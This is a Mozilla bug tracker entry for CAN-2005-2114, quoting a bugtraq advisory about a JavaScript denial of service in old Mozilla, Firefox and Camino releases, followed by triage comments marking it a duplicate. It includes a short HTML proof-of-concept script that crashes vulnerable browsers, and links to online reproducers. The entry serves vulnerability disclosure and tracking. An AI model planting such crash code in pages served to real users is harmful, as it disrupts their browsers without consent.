300955 - CAN-2005-2114 javascript crash from calling an empty function

Status: RESOLVED DUPLICATE of bug 299816

(Core :: JavaScript Engine, defect)

Description

[Josh Bressers]

A denial of service is possible via JavaScript that repeatedly calls an empty
function.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2114
has more information.

The URL link has a reproducer.


Here is the text which was posted to bugtraq:


Mozilla Multiple Product JavaScript Issue
http://www.kurczaba.com/html/security/0506241.htm
-------------------------------------------------

Vendor:
Mozilla (http://www.mozilla.org)

Vulnerable Software:
Mozilla 1.7.8
Firefox 1.0.4
Camino 0.8.4

Vulnerability/Exploit:
By using a specially crafted JavaScript function, it is possible to 
crash the above named browsers. The script can be executed both with and 
without user intervention.

Proof of Concept:
-----START of PoC-----
<html>
<head>
</head>
<body>
<script language="JavaScript">
	//Run the function 20000 times
		for (a = 0; a <= 20000; a++)
		{
			//Here is the special code that terminates the browser
			function(){};
		}
	//Displays an alert to notify the user if the browser is not vulnerable.
		alert("Good news - Your browser is not vulnerable.");
</script>
</body>
</html>
-----END of PoC-----


Proof of Concept (Online):
Manual: http://www.kurczaba.com/html/security/0506241_poc.htm
Automatic: http://www.kurczaba.com/html/security/0506241_poc2.htm

Workaround:
Disable JavaScript

Date Discovered:
June 14, 2005

Severity:
Low

Credit:
Paul Kurczaba

Comment 1

[Brendan Eich [:brendan]]

Josh, this has been known for a while, so of course dup'd a lot, now by you. 
Can you say why you didn't find bug 299209?

/be

*** This bug has been marked as a duplicate of 299209 ***

Comment 2

[Mark Cox]

Note bug 299209 is marked private

Comment 3

[timeless]

*** This bug has been marked as a duplicate of 299816 ***

Comment 4

[timeless]

*** This bug has been marked as a duplicate of 299816 ***